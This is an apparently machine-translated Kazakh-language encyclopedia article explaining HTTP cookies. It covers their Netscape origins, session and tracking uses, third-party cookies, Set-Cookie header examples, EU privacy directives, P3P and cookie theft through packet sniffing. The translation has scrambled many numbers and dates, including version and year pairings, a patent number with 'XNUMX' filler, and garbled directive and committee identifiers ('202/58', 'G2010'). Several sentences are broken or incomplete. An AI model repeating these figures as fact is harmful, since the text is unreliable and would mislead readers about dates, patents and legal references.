Интернет-куки: бұл не? Анықтамасы, шығу тегі, түрлері және құпиялылығы

Un cookie немесе веб-куки (немесе печенье, ретінде қысқартылған куәгер Квебекте) HTTP серверімен HTTP клиентіне жіберілген ақпарат тізбегі ретінде HTTP байланыс протоколымен анықталады, соңғысы белгілі бір шарттарда бірдей HTTP сервері сұралған сайын қайтарады.

Cookie файлы a эквиваленті терминалда сақталған шағын мәтіндік файл Интернет пайдаланушысының. 20 жылдан астам уақыт бойы жұмыс істеп тұрған олар веб-сайт әзірлеушілеріне шарлауды жеңілдету және белгілі бір функцияларға рұқсат беру үшін пайдаланушы деректерін сақтауға мүмкіндік береді. Cookie файлдары әрқашан азды-көпті даулы болды, өйткені оларда үшінші тұлғалар пайдалануы мүмкін қалдық жеке ақпарат бар.

Ол HTTP тақырыбы ретінде веб-сервер арқылы веб-шолғышқа жіберіледі, ол серверге кірген сайын оны өзгеріссіз қайтарады. Cookie файлын қолдануға болады аутентификация, сессия (мемлекеттік қамтамасыз ету), және үшін пайдаланушы туралы нақты ақпаратты сақтау, мысалы, сайт теңшелімдері немесе электрондық сатып алу себетінің мазмұны. Cookie термині келесіден шыққан сиқырлы печенье, UNIX есептеуішіндегі белгілі концепция, ол браузердің cookie файлдарының идеясы мен атауын шабыттандырды. Cookie файлдарының бірнеше баламалары бар, олардың әрқайсысының өзіндік пайдалануы, артықшылықтары мен кемшіліктері бар.

Қарапайым мәтіндік файлдар болғандықтан, cookie файлдары орындалмайды. Олар емес шпиондық бағдарламалар да, вирустар да емес, дегенмен кейбір сайттардағы cookie файлдары көптеген антивирустық бағдарламалық құрал арқылы анықталады, себебі олар пайдаланушыларға бірнеше сайтқа кірген кезде бақылауға мүмкіндік береді. 

Көптеген заманауи браузерлер пайдаланушыларға мүмкіндік береді cookie файлдарын қабылдау немесе қабылдамау туралы шешім қабылдау. Пайдаланушылар да мүмкін cookie файлдарының қанша уақыт сақталатынын таңдаңыз. Дегенмен, cookie файлдарын толығымен қабылдамау кейбір сайттарды жарамсыз етеді. Мысалы, тіркелгі деректерін (пайдаланушы аты мен құпия сөз) пайдаланып кіруді қажет ететін сауда арбаларын немесе сайттарды сақтаңыз.

тарихи

Термин куки ағылшын терминінен шыққан сиқырлы печенье, бұл бағдарлама қабылдайтын және өзгеріссіз қайтаратын деректер пакеті. Cookie файлдары АТ-да бұрыннан қолданылған Лу Монтулли оларды веб-коммуникацияда пайдалану идеясы болды маусымда 1994. Сол кезде ол клиент үшін электрондық коммерция қосымшасын әзірлеген Netscape Communications компаниясында жұмыс істеді. Cookie файлдары дүкеннің виртуалды сатып алу арбасын іске асырудың сенімділігі мәселесін шешуге мүмкіндік берді.

Джон Джаннандреа мен Лу Монтулли сол жылы Netscape-тің алғашқы cookie спецификациясын жазды. 0.9 жылы 13 қазанда шығарылған Mosaic Netscape 1994 бета нұсқасы, біріктірілген cookie технологиясы (постты қараңыз). Cookie файлдарын бірінші (эксперименттік емес) пайдалану Netscape веб-сайтына келушілердің сайтқа бұрын кіргенін анықтау болды. Монтулли 1995 жылы cookie технологиясына патенттік өтінім берді және АҚШ патенті 5774670 XNUMX XNUMX берілді. 1998 жылы берілген.

0.9 жылы Netscape 1994 бета нұсқасына енгізілгеннен кейін cookie файлдары 2 жылдың қазан айында шығарылған Internet Explorer 1995 бағдарламасына біріктірілді.

Cookie файлдарын енгізу жұртшылыққа әлі кеңінен танымал болған жоқ. Атап айтқанда, cookie файлдары браузер параметрлерінде әдепкі бойынша қабылданған және пайдаланушыларға олардың бар екендігі туралы хабарланбаған. Кейбір адамдар cookie файлдарының бар екенін 1995 жылдың бірінші тоқсанында білген, бірақ қарапайым жұртшылық Financial Times 12 жылы 1996 ақпанда мақала жариялаған соң ғана олардың бар екенін білді. Сол жылы cookie файлдары бұқаралық ақпарат құралдарында көп назар аударды. мүмкін болатын құпиялылыққа қол сұғуға байланысты. Куки тақырыбы 1996 және 1997 жылдары Американың Федералдық сауда комиссиясының екі консультациясында талқыланды.

Ресми cookie спецификациясын әзірлеу қазірдің өзінде жүріп жатыр. Ресми спецификацияның алғашқы талқылаулары 1995 жылдың сәуірінде www-talk пошталық тізімінде өтті. IETF арнайы жұмыс тобы құрылды. HTTP транзакцияларына күйді енгізу бойынша екі баламалы ұсынысты сәйкесінше Брайан Белендорф пен Дэвид Кристол ұсынды, бірақ Кристолдың өзі басқаратын топ Netscape спецификациясын бастапқы нүкте ретінде пайдалануды ұйғарды. 1996 жылдың ақпанында жұмыс тобы үшінші тарап cookie файлдарының жеке өмірге елеулі қауіп екенін анықтады. Топ шығарған спецификация ақыры ретінде жарияланды RFC 2109.

2014 жылдың соңынан бастап біз көптеген сайттарда cookie файлдары туралы баннерді көреміз. мүмкіндік беретін кем дегенде бір шолғыш кеңейтімі бар баннер көрсетілмеген.

Cookie файлдарының түрлері және қолданулары

Сеансты басқару

Cookie файлдарын навигация кезінде, сонымен қатар бірнеше рет кіру кезінде пайдаланушы деректерін сақтау үшін пайдалануға болады. Cookie файлдары электронды сатып алу арбаларын, виртуалды құрылғыны жүзеге асыру құралын қамтамасыз ету үшін енгізілді, онда пайдаланушы сайтты шолу кезінде сатып алғысы келетін заттарды жинай алады.

Бұл күндері сатып алу арбалары сияқты қолданбалар оның орнына дерекқордағы элементтер тізімін серверде сақтайды, бұл жақсырақ; оларды cookie файлында сақтаудан гөрі. Веб-сервер бірегей сеанс идентификаторы бар cookie файлын жібереді. Содан кейін веб-шолғыш осы сеанс идентификаторын әрбір келесі сұрауда қайтарады және себеттегі элементтер сақталады және осы бірегей сеанс идентификаторымен байланыстырылады.

Cookie файлдарын жиі пайдалану тіркелгі деректерін пайдаланып сайтқа кіру үшін пайдалы. Қысқаша айтқанда, веб-сервер алдымен бірегей сеанс идентификаторы бар cookie файлын жібереді. Содан кейін пайдаланушылар өздерінің тіркелгі деректерін береді (әдетте пайдаланушы аты мен құпия сөз). Содан кейін веб-бағдарлама сеанстың түпнұсқалығын растайды және пайдаланушыға қызметке қол жеткізуге мүмкіндік береді.

даралау

Cookie файлдары болашақта оған сәйкес мазмұнды көрсету үшін сайттың пайдаланушысы туралы ақпаратты есте сақтау үшін пайдаланылуы мүмкін. Мысалы, веб-сервер сол веб-сайтқа кіру үшін пайдаланылған соңғы пайдаланушы аты бар cookie файлын жібере алады, осылайша пайдаланушы аты болашақ кірулерде алдын ала толтырылуы мүмкін.

Көптеген веб-сайттар пайдаланушы қалауларына негізделген жекелендіру үшін cookie файлдарын пайдаланады. Пайдаланушылар пішінде өз қалауларын таңдап, оларды серверге жібереді. Сервер cookie файлындағы теңшелімдерді кодтайды және оны шолғышқа қайта жібереді. Кейіннен, пайдаланушы осы сайттың бетіне кірген сайын, браузер cookie файлын, демек, теңшелімдер тізімін қайтарады; содан кейін сервер бетті пайдаланушының қалауы бойынша теңшей алады. Мысалы, Wikipedia веб-сайты пайдаланушыларға өздері қалаған сайттың мұқабасын таңдауға мүмкіндік береді. Google іздеу жүйесі өз пайдаланушыларына (тіпті олар тіркелмеген болса да) әрбір нәтиже бетінде көргісі келетін нәтижелер санын таңдауға мүмкіндік береді.

Бақылау

Бақылау cookie файлдары интернет пайдаланушыларының шолу әдеттерін бақылау үшін пайдаланылады. Мұны бетке сұрау жасайтын компьютердің IP мекенжайын пайдалану немесе клиент әрбір сұраумен жіберетін 'referrer' HTTP тақырыбын пайдалану арқылы да ішінара жасауға болады, бірақ cookie файлдары үлкен дәлдікке мүмкіндік береді. Мұны келесі мысалдағыдай жасауға болады:

1. Егер пайдаланушы сайттағы бетті шақырса және сұрауда cookie файлы болмаса, сервер бұл пайдаланушы кірген бірінші бет деп есептейді. Содан кейін сервер кездейсоқ жолды жасайды және оны сұралған бетпен бірге браузерге жібереді.
2. Осы сәттен бастап cookie файлы сайттың жаңа беті шақырылған сайын браузер арқылы автоматты түрде жіберіледі. Сервер бетті әдеттегідей жібереді, сонымен қатар шақырылған беттің URL мекенжайын, сұраудың күнін, уақытын және журнал файлындағы cookie файлын тіркейді.

Журнал файлына қарап, пайдаланушының қай беттерге және қандай ретпен кіргенін көруге болады. Мысалы, егер файлда id=abc cookie файлы арқылы жасалған бірнеше сұраулар болса, бұл барлық сұраулардың бір пайдаланушыдан келетінін анықтауы мүмкін. Сұралған URL мекенжайы, сұраулармен байланысты күн мен уақыт пайдаланушының шолуын бақылауға мүмкіндік береді.

Төменде түсіндірілген үшінші тарап cookie файлдары мен веб-маяктары әртүрлі сайттарда бақылауды қосады. Бір сайтты бақылау әдетте статистикалық мақсаттар үшін қолданылады. Керісінше, үшінші тарап cookie файлдарын пайдаланып әртүрлі сайттардағы бақылауды әдетте жарнама компаниялары анонимді пайдаланушы профильдерін жасау үшін пайдаланады (олар кейін пайдаланушыға қандай жарнамаларды көрсету керектігін анықтау үшін, сондай-ақ оған осы жарнамаларға сәйкес электрондық хаттарды жіберу үшін пайдаланылады — SPAM ).

Бақылау cookie файлдары пайдаланушының жеке өміріне қол сұғу қаупі болып табылады, бірақ оларды оңай жоюға болады. Көптеген заманауи браузерлер қолданбаны жабу кезінде тұрақты cookie файлдарын автоматты түрде жою опциясын қамтиды.

Үшінші тарап cookie файлдары

Веб-беттегі кескіндер мен басқа нысандар бетті орналастыратын серверден басқа серверлерде болуы мүмкін. Бетті көрсету үшін браузер осы нысандардың барлығын жүктеп алады. Көптеген веб-сайттар әртүрлі көздерден алынған ақпаратты қамтиды. Мысалы, браузерге www.example.com деп терсеңіз, беттің бір бөлігінде әртүрлі көздерден, яғни www. .example.com доменінен басқа доменнен келетін нысандар немесе жарнамалар жиі болады. "Бірінші" тарап cookie файлдары браузердің мекенжай жолағында тізімделген домен арқылы орнатылатын cookie файлдары болып табылады. Үшінші тарап cookie файлдары басқа доменнен келетін бет нысандарының бірі арқылы орнатылады.

Әдепкі бойынша, Mozilla Firefox, Microsoft Internet Explorer және Opera сияқты браузерлер үшінші тарап cookie файлдарын қабылдайды, бірақ пайдаланушылар оларды блоктау үшін шолғыш опцияларындағы параметрлерді өзгерте алады. Веб функционалдығын қосатын үшінші тарап cookie файлдарына тән қауіпсіздік қаупі жоқ, бірақ олар пайдаланушыларды бақылау үшін де қолданылады. сайттан сайтқа.

Google Chrome, соның ішінде барлық браузерлер үшін қолжетімді Ghostery сияқты құралдар үшінші тараптар арасындағы алмасуларды блоктай алады.

Іске асыру

Cookie файлдары веб-сервер браузерге жіберілетін деректердің шағын бөліктері болып табылады. Браузер оларды күйді (өткен оқиғалардың жады) басқа жағдайда азаматтығы жоқ HTTP транзакциясына енгізе отырып, серверге өзгертпей қайтарады. Cookie файлдарынсыз веб-беттің немесе веб-беттің құрамдас бөлігінің әрбір шығарылуы бір сайтқа жасалған басқа сұрауларға тәуелсіз оқшауланған оқиға болып табылады. Веб-сервер орнату мүмкіндігінен басқа, cookie файлдарын браузер қолдаса және рұқсат етсе, JavaScript сияқты сценарий тілдері арқылы да орнатуға болады.

Ресми cookie спецификациясы браузерлер cookie файлдарының ең аз санын сақтап, қайта жібере алуы керек екенін көрсетеді. Атап айтқанда, браузер әрқайсысы төрт килобайттан тұратын кемінде 300 cookie файлын және бір сервер немесе домен үшін кемінде 20 cookie файлын сақтай алуы керек.

3.1 тармағына сәйкес RFC 2965, cookie файлдарының атаулары регистрді ескермейді.

Cookie оның жарамдылық мерзімін көрсете алады, бұл жағдайда cookie осы күні жойылады. Cookie жарамдылық мерзімін көрсетпесе, cookie пайдаланушы браузерінен шыққан бойда жойылады. Сондықтан жарамдылық мерзімін көрсету cookie файлының бірнеше сеанстар арқылы аман қалуының жолы болып табылады. Осы себепті жарамдылық мерзімі бар cookie файлдары деп айтылады табанды. Қолданбаның мысалы: бөлшек сауда сайты пайдаланушылар себетіне салған элементтерді жазу үшін тұрақты cookie файлдарын пайдалануы мүмкін (шын мәнінде, cookie файлы компьютерде емес, сату сайтындағы дерекқорда сақталған жазбаға сілтеме жасауы мүмкін) . Бұл арқылы, егер пайдаланушылар сатып алмастан браузерінен шығып, кейінірек қайта оралса, олар қоржындағы заттарды қайтадан таба алады. Егер бұл cookie файлдары жарамдылық мерзімін бермесе, браузер жабылған кезде олардың жарамдылық мерзімі аяқталып, себеттің мазмұны туралы ақпарат жоғалып кетер еді.

Cookie файлдарының ауқымы оларды жасаған сервердегі белгілі бір домен, қосалқы домен немесе жолмен шектелуі мүмкін.

Cookie файлын құру

Веб-беттерді тасымалдау HyperText Transfer Protocol (HTTP) арқылы жүзеге асырылады. Cookie файлдарын елемеу арқылы шолғыштар веб-серверлерден бетке әдетте қысқа мәтінді жіберу арқылы шақырады HTTP сұрауы. Мысалы, www.example.org/index.html бетіне кіру үшін браузерлер www.example.org серверіне қосылып, келесідей сұрау жібереді:

	GET /index.html HTTP/1.1 Host: www.example.org
навигатор	→	serveur

Сервер сұралған бетті жіберу арқылы жауап береді, оның алдында ұқсас мәтін бар, барлығы шақырылады HTTP жауабы. Бұл пакетте браузерге cookie файлдарын сақтауға нұсқау беретін жолдар болуы мүмкін:

	HTTP/1.1 200 OKМазмұн түрі: мәтін/htmlSet-Cookie: атау=мән (HTML беті)
навигатор	←	serveur

Сервер шолғыштың cookie файлын сақтауын қаласа, сервер Set-Cookie жолын ғана жібереді. Set-Cookie — браузерге name=value жолын сақтауға және оны серверге барлық болашақ сұрауларда қайтаруға арналған сұрау. Браузер cookie файлдарын қолдаса және шолғыш опцияларында cookie файлдары қосылған болса, cookie файлы бір серверге жасалған барлық кейінгі сұрауларға қосылады. Мысалы, браузер www.example.org/news.html бетін www.example.org серверіне келесі сұрауды жіберу арқылы шақырады:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueҚабылдау: */*
навигатор	→	serveur

Бұл сол серверден басқа бетке сұрау және жоғарыдағы біріншіден ерекшеленеді, себебі ол сервер бұрын браузерге жіберген жолды қамтиды. Осы құралдың арқасында сервер бұл сұраудың алдыңғысына байланысты екенін біледі. Сервер шақырылған бетті жіберу, сонымен қатар оған басқа cookie файлдарын қосу арқылы жауап береді.

Cookie файлының мәнін сервер шақырылған бетке жауап ретінде Set-Cookie: name=new_value жаңа жолын жіберу арқылы өзгерте алады. Содан кейін браузер ескі мәнді жаңасымен ауыстырады.

Set-Cookie желісі әдетте HTTP серверімен емес, CGI бағдарламасы немесе басқа сценарий тілі арқылы жасалады. HTTP сервері (мысалы: Apache) браузерге бағдарламаның нәтижесін (cookie файлдары бар тақырыптың алдында тұрған құжат) ғана жібереді.

Cookie файлдарын JavaScript немесе браузерде жұмыс істейтін басқа ұқсас тілдерде орнатуға болады, яғни сервер жағында емес, клиент жағында. Бұл мақсат үшін JavaScript-те document.cookie нысаны пайдаланылады. Мысалы, document.cookie = "temperature=20" мәлімдемесі "температура" деп аталатын және 20 мәні бар cookie файлын жасайды.

Cookie файлының атрибуттары

Атау/мән жұбынан басқа, cookie файлында жарамдылық мерзімі, жол, домен атауы және жоспарланған қосылым түрі, яғни қалыпты немесе шифрланған болуы мүмкін. RFC 2965 сонымен қатар cookie файлдарында міндетті нұсқа нөмірі болуы керек екенін анықтайды, бірақ бұл әдетте қабылданбайды. Бұл деректер бөліктері name=new_value жұбынан кейін және нүктелі үтірмен бөлінген. Мысалы, cookie файлын Set-Cookie жолын жіберу арқылы сервер жасай алады: name=new_value; мерзімі аяқталады=күн; жол=/; домен=.example.org.

Cookie файлының жарамдылық мерзімі

Cookie файлдарының мерзімі аяқталады және келесі жағдайларда браузер серверге жібермейді:

• Браузер жабылған кезде, cookie файлы тұрақты болмаса.
• Cookie файлының жарамдылық мерзімі өткен кезде.
• Cookie файлының жарамдылық мерзімі (сервер немесе сценарий арқылы) өткен күнге өзгертілгенде.
• Пайдаланушының сұрауы бойынша браузер cookie файлын жойған кезде.

Үшінші жағдай серверлерге немесе сценарийлерге cookie файлын анық жоюға мүмкіндік береді. Мазмұн параметрлеріне кіру арқылы белгілі бір cookie файлының жарамдылық мерзімін Google Chrome веб-шолғышымен білуге ​​болатынын ескеріңіз. Компьютерде сақталған cookie файлы, егер оны өшіру процедурасы орындалмаса, онда бірнеше ондаған жылдар бойы сақталуы мүмкін.

Стереотиптер

Интернетке енгізілгеннен бері cookie файлдары туралы көптеген идеялар Интернетте және бұқаралық ақпарат құралдарында тарады. 1998 жылы CIAC, Америка Құрама Штаттарының Энергетика министрлігінің компьютерлік инциденттерді бақылау тобы cookie файлдарының қауіпсіздігінің осал тұстары «міндетті түрде жоқ» екенін анықтады және «сіздің кірулеріңіздің шығу тегі және сіз кірген веб-беттер туралы мәліметтер туралы ақпарат» деп түсіндірді. веб-серверлердің журнал файлдарында бұрыннан бар». 2005 жылы Jupiter Research зерттеу нәтижелерін жариялады, онда респонденттердің айтарлықтай пайызы келесі мәлімдемелерді қарастырды:

• Cookies сияқты вирус, олар пайдаланушылардың қатты дискілерін жұқтырады.
• Cookie файлдары жасалады кенеттен шыққан.
• Cookie файлдары жіберу үшін пайдаланылады Спам.
• Cookie файлдары тек жарнама үшін пайдаланылады.

Cookie файлдары пайдаланушының компьютерінен ақпаратты өшіре немесе оқи алмайды. Дегенмен, cookie файлдары берілген сайтта немесе сайттар жинағында пайдаланушы кірген веб-беттерді анықтауға мүмкіндік береді. Бұл ақпаратты үшінші тараптарға пайдалануға немесе қайта сатуға болатын пайдаланушы профилінде жинауға болады, бұл маңызды құпиялылық мәселелерін тудыруы мүмкін. Кейбір профильдер анонимді болып табылады, яғни оларда жеке ақпарат жоқ, бірақ мұндай профильдер күмән тудыруы мүмкін.

Сол зерттеуге сәйкес, интернет қолданушылардың үлкен пайызы cookie файлдарын қалай жою керектігін білмейді. Адамдардың cookie файлдарына сенбейтін себептерінің бірі - кейбір сайттардың cookie файлдарының жеке тұлғаны анықтау аспектісін теріс пайдалануы және бұл ақпаратты басқа көздермен бөлісуі. Спам деп саналатын мақсатты жарнаманың және сұралмаған электрондық поштаның үлкен пайызы cookie файлдарын қадағалау нәтижесінде алынған ақпараттан келеді.

Браузер параметрлері

Көптеген браузерлер cookie файлдарын қолдайды және пайдаланушыға оларды өшіруге мүмкіндік береді. Ең көп таралған опциялар:

• Cookie файлдарын толығымен қосыңыз немесе өшіріңіз, осылайша олар үнемі қабылданады немесе блокталады.
• Браузердің мекенжай жолағына javascript: alert(document.cookie) енгізу арқылы пайдаланушыға берілген беттегі белсенді cookie файлдарын көруге рұқсат беріңіз. Кейбір шолғыштар браузерде қазіргі уақытта сақталған cookie файлдарын көре және таңдап жоя алатын пайдаланушыға арналған cookie басқарушысын біріктіреді.

Көптеген браузерлер сонымен қатар cookie файлдарын қамтитын жеке деректерді толығымен жоюға мүмкіндік береді. Cookie рұқсаттарын басқаруға арналған қосымша модульдер де бар.

Құпиялылық және үшінші тарап cookie файлдары

Бұл жалған мысалда жарнамалық компания екі веб-сайтта баннерлер орналастырды. Баннерлерді серверлерінде орналастыру және үшінші тарап cookie файлдарын пайдалану арқылы жарнамалық компания пайдаланушының осы екі сайт арқылы шарлауын бақылай алады.

Cookie файлдарының веб-пайдаланушылардың құпиялылығы мен анонимділігі үшін маңызды салдары бар. Cookie файлдары тек оларды орнатқан серверге немесе бір Интернет доменіне жататын серверге қайтарылғанымен, веб-бетте басқа домендерге жататын серверлерде сақталған кескіндер немесе басқа компоненттер болуы мүмкін. Осы сыртқы компоненттерді қалпына келтіру кезінде орнатылатын cookie файлдары деп аталады үшінші тарап cookie файлдары. Бұған қалаусыз қалқымалы терезелердегі cookie файлдары кіреді.

Жарнамалық компаниялар пайдаланушыларды олар кіретін әртүрлі сайттардағы бақылау үшін үшінші тарап cookie файлдарын пайдаланады. Атап айтқанда, жарнамалық компания пайдаланушыны жарнамалық кескіндерді немесе бақылау пикселін орналастырған барлық беттер бойынша бақылай алады. Пайдаланушы кірген беттерді білу жарнамалық компанияға пайдаланушының жарнамалық қалауларын бағыттауға мүмкіндік береді.

Пайдаланушы профилін құру мүмкіндігін кейбіреулер құпиялылыққа қол сұғу деп санайды, әсіресе бақылау үшінші тарап cookie файлдары арқылы әртүрлі домендерде орындалғанда. Осы себепті кейбір елдерде cookie заңнамасы бар.

Америка Құрама Штаттары үкіметі 2000 жылы Ақ үйдің есірткі саясаты кеңсесі есірткінің онлайн жарнамаларын қарайтын пайдаланушылардың компьютерлерін бақылау үшін cookie файлдарын пайдаланғаны анықталғаннан кейін cookie файлдарын орналастыру бойынша қатаң ережелерді енгізді. 2002 жылы құпиялылық белсендісі Дэниел Брандт ЦРУ өзінің веб-сайттарына кірген компьютерлерде тұрақты cookie файлдарын қалдыратынын анықтады. Бұл бұзушылық туралы хабардар болғаннан кейін ЦРУ бұл cookie файлдары әдейі жіберілмегенін мәлімдеді және оларды орнатуды тоқтатты. 25 жылдың 2005 желтоқсанында Брандт Ұлттық қауіпсіздік агенттігінің (ҰҚА) бағдарламалық құралды жаңартуға байланысты келушілердің компьютерлерінде екі тұрақты cookie файлын қалдырғанын анықтады. Ескертуден кейін NSA cookie файлдарын бірден өшірді.

Ұлыбританияда, The Cookie заңы «, 25 жылдың 2012 мамырында күшіне енген, сайттарды өз ниеттерін жариялауға міндеттейді, осылайша пайдаланушыларға Интернетте олардың ізін қалдырғысы келетін-келмейтінін таңдауға мүмкіндік береді. Осылайша, оларды жарнамалық мақсаттылықтан қорғауға болады. Дегенмен, сәйкес Guardian, Интернет пайдаланушыларының келісімі міндетті түрде анық емес; пайдаланушы келісімінің шарттарына өзгертулер енгізілді, оны жасау осылайша білдіреді.

Құпиялық туралы 2002/58 директивасы

202/58 құпиялылық және электрондық коммуникациялар директивасында cookie файлдарын пайдалану ережелері бар. Атап айтқанда, осы директиваның 5-бабының 3-тармағы пайдаланушының компьютерінде деректерді (мысалы, cookie файлдарын) сақтау тек келесі жағдайларда ғана жүзеге асырылуы мүмкін екенін талап етеді:

• пайдаланушы деректердің қалай пайдаланылғаны туралы хабардар болады;
• пайдаланушыға осы сақтау әрекетінен бас тарту мүмкіндігі беріледі. Бірақ бұл бапта техникалық себептер бойынша деректерді сақтау осы заңнан босатылатыны да айтылған.

2003 жылдың қазан айынан бастап жүзеге асырылатын болғандықтан, директиваның 2004 жылғы желтоқсандағы есебіне сәйкес іс жүзінде өте жетілдірілмеген түрде жүзеге асырылды, сонымен қатар кейбір мүше мемлекеттер (Словакия, Латвия, Греция, Бельгия және Люксембург) әлі де талаптарды ауыстырмағанына назар аударды. ішкі заңнамаға директива.

29 жылғы G2010 пікіріне сәйкес, интернет пайдаланушының нақты келісімі бойынша cookie файлдарын мінез-құлық жарнамасы мақсатында пайдалануды ерекше шарттайтын бұл директива өте нашар қолданылады. Шындығында, сайттардың көпшілігі директиваға сәйкес келмейтін жолмен, «cookie» файлдарын пайдалану туралы ақпарат беретін қарапайым «баннермен» шектеліп, пайдалану туралы ақпарат бермей, «техникалық» cookie файлдарын ажыратпай жасайды. «бақылау» cookie файлдарын, сондай-ақ техникалық cookie файлдарын сақтауды қалайтын пайдаланушыға нақты таңдауды ұсыну (мысалы, себет басқару cookie файлдары) және «бақылаудан» бас тарту. Шын мәнінде, cookie файлдарынан бас тартылса, көптеген сайттар дұрыс жұмыс істемейді, бұл 2002/58 директивасына немесе 95/46 директивасына (Жеке деректерді қорғау) сәйкес келмейді.

2009/136/CE директивасы

Бұл материал 2009 жылғы 136 қарашадағы 25/2009/EC директивасымен жаңартылды, онда «абоненттің немесе пайдаланушының терминалдық жабдығында ақпаратты сақтауға немесе бұрыннан сақталған ақпаратқа қол жеткізуге рұқсат етілген жағдайда ғана рұқсат етіледі. Абонент немесе пайдаланушы 95/46/EC директивасына сәйкес басқалар арасында өңдеу мақсаттары туралы анық және толық ақпаратты алғаннан кейін өз келісімін берді». Сондықтан жаңа директива Интернет пайдаланушысының компьютеріне cookie файлдарын орналастыру алдындағы міндеттемелерді күшейтеді.

Директиваның алдын ала қарастыруларында еуропалық заң шығарушы мынаны көрсетеді: «95/46/EC директивасының тиісті ережелеріне сәйкес техникалық мүмкін және тиімді болған жағдайда пайдаланушының өңдеуге келісімі шолғыштың немесе басқа қолданбаның сәйкес параметрлерін пайдалану». Бірақ шын мәнінде, бүгінгі күнге дейін бірде-бір браузер маңызды техникалық cookie файлдарын пайдаланушының таңдауына қалдырылатын қосымшалардан ажыратуға мүмкіндік бермейді.

Бұл жаңа директиваны бельгиялық депутаттар 2012 жылдың шілдесінде ауыстырды. 2014 жылғы зерттеу көрсеткендей, тіпті депутаттар да қолдануға қиналады. директиваның шектеулері.

P3P

P3P спецификациясы сервердің қандай ақпарат түрін және қандай мақсатта жинайтынын анықтайтын құпиялылық саясатын айту мүмкіндігін қамтиды. Бұл саясаттар cookie файлдары арқылы жиналған ақпаратты пайдалануды қамтиды (бірақ олармен шектелмейді). P3P анықтамаларына сәйкес браузер құпиялылық саясатын пайдаланушының қалауларымен салыстыру немесе пайдаланушыдан сұрау, сервер жариялаған құпиялылық саясатының құпиялылық мәлімдемесін ұсыну арқылы cookie файлдарын қабылдай алады немесе қабылдамайды.

Көптеген браузерлер, соның ішінде Apple Safari және Microsoft Internet Explorer 6 және 7 нұсқалары, браузерге үшінші тарап cookie файлдарын сақтауды қабылдау-қабылдамауды анықтауға мүмкіндік беретін P3P протоколын қолдайды. Opera браузері пайдаланушыларға үшінші тарап cookie файлдарынан бас тартуға және Интернет домендері үшін жаһандық және арнайы қауіпсіздік профилін жасауға мүмкіндік береді. Mozilla Firefox-тың 2-нұсқасы P3P қолдауын тоқтатты, бірақ оны 3-нұсқада қалпына келтірді.

Пайдаланушының веб-тәжірибесіне теріс әсер етпей, құпиялылықты арттыру және жарнаманы бақылауды азайту үшін үшінші тарап cookie файлдарын көптеген браузерлер бұғаттай алады. Көптеген жарнама агенттіктері опцияны ұсынады жалтақтау шолғышта осы таргеттеуді өшіретін жалпы cookie файлын орнату арқылы мақсатты жарнамаға, бірақ мұндай шешім сақталса, іс жүзінде тиімді емес, себебі бұл жалпы cookie пайдаланушы осы cookie файлдарын жойған бойда жойылады, бұл таңдаудан бас тартады. шешім шығару.

Cookie файлдарының кемшіліктері

Құпиялылық мәселелерінен басқа, cookie файлдарының кейбір техникалық кемшіліктері де бар. Атап айтқанда, олар әрқашан пайдаланушыларды дәл анықтай бермейді, олар көп мөлшерде болған кезде сайттың жұмысын баяулатуы мүмкін, олар қауіпсіздік шабуылдары үшін пайдаланылуы мүмкін және олар мемлекеттік трансфертке, бағдарламалық жасақтаманың архитектуралық стиліне қайшы келеді.

Дәл емес сәйкестендіру

Егер компьютерде бірнеше шолғыш пайдаланылса, олардың әрқайсысында әрқашан cookie файлдары үшін бөлек сақтау бірлігі болады. Сондықтан cookie файлдары адамды анықтамайды, бірақ пайдаланушы тіркелгісінің, компьютердің және веб-шолғыштың тіркесімі. Осылайша, кез келген адам осы тіркелгілерді, компьютерлерді немесе cookie файлдары бар браузерлерді пайдалана алады. Сол сияқты, cookie файлдары бір пайдаланушы тіркелгісін, компьютерді және браузерді ортақ пайдаланатын бірнеше пайдаланушыларды, мысалы, «интернет кафелерінде» немесе компьютерлік ресурстарға еркін қол жеткізуге мүмкіндік беретін кез келген жерде айырмашылығы жоқ.

Бірақ іс жүзінде бұл мәлімдеме көп жағдайда жалған болып шығады, өйткені бүгінгі күні «жеке» компьютерді (немесе смартфонды немесе планшетті, одан да жаманы) негізінен бір адам пайдаланады.Бұл белгілі бір адамға бағытталған және Жиналған ақпарат көлемі арқылы тұлға «дәлірек» анықталмаған болса да, жеке мақсатқа жету.

Печеньелерді ұрлау

Cookie файлын желідегі басқа компьютер ұрлауы мүмкін.

Қалыпты жұмыс кезінде cookie файлдары сервер (немесе бір домендегі серверлер тобы) мен пайдаланушының компьютер браузері арасында кері жіберіледі. Cookie файлдарында құпия ақпарат болуы мүмкін болғандықтан (пайдаланушы аты, аутентификация үшін пайдаланылатын құпия сөз және т.б.), олардың мәндері басқа компьютерлерге қол жетімді болмауы керек. Cookie файлдарын ұрлау – рұқсат етілмеген үшінші тараптың cookie файлдарын ұстау әрекеті.

Cookie файлдарын сеанс ұрлау деп аталатын шабуылда пакеттік снайфер арқылы ұрлауға болады. Желідегі трафикті жіберу және қабылдау компьютерлерінен басқа компьютерлер (әсіресе шифрланбаған жалпыға ортақ Wi-Fi кеңістігінде) ұстап алуы және оқуы мүмкін. Бұл трафик кәдімгі HTTP протоколын пайдаланып сеанстар арқылы жіберілген cookie файлдарын қамтиды. Желі трафигі шифрланбаған кезде, зиянды пайдаланушылар осылайша «пакеттік снайферлер» арқылы желідегі басқа пайдаланушылардың байланыстарын оқи алады.

Бұл мәселені HTTPS протоколы арқылы пайдаланушы компьютері мен сервер арасындағы байланысты шифрлау арқылы шешуге болады. Сервер мынаны көрсете алады қауіпсіз жалау cookie файлын орнату кезінде; шолғыш оны тек SSL қосылымы сияқты қауіпсіз желі арқылы жібереді.

Дегенмен, көптеген сайттар пайдаланушы аутентификациясы үшін HTTPS шифрланған байланысын пайдаланғанымен (яғни кіру беті), тиімділік үшін шифрланбаған HTTP қосылымдары арқылы кейінірек сеанс cookie файлдарын және басқа деректерді әдеттегідей жібереді. Осылайша, шабуылдаушылар басқа пайдаланушылардың cookie файлдарын ұстай алады және оларды тиісті сайттарда еліктей алады немесе оларды cookie шабуылдарында пайдалана алады.

Сайттағы сценарийлер: сервер мен клиент арасында ғана алмасуға болатын cookie файлы басқа үшінші тарапқа жіберіледі.

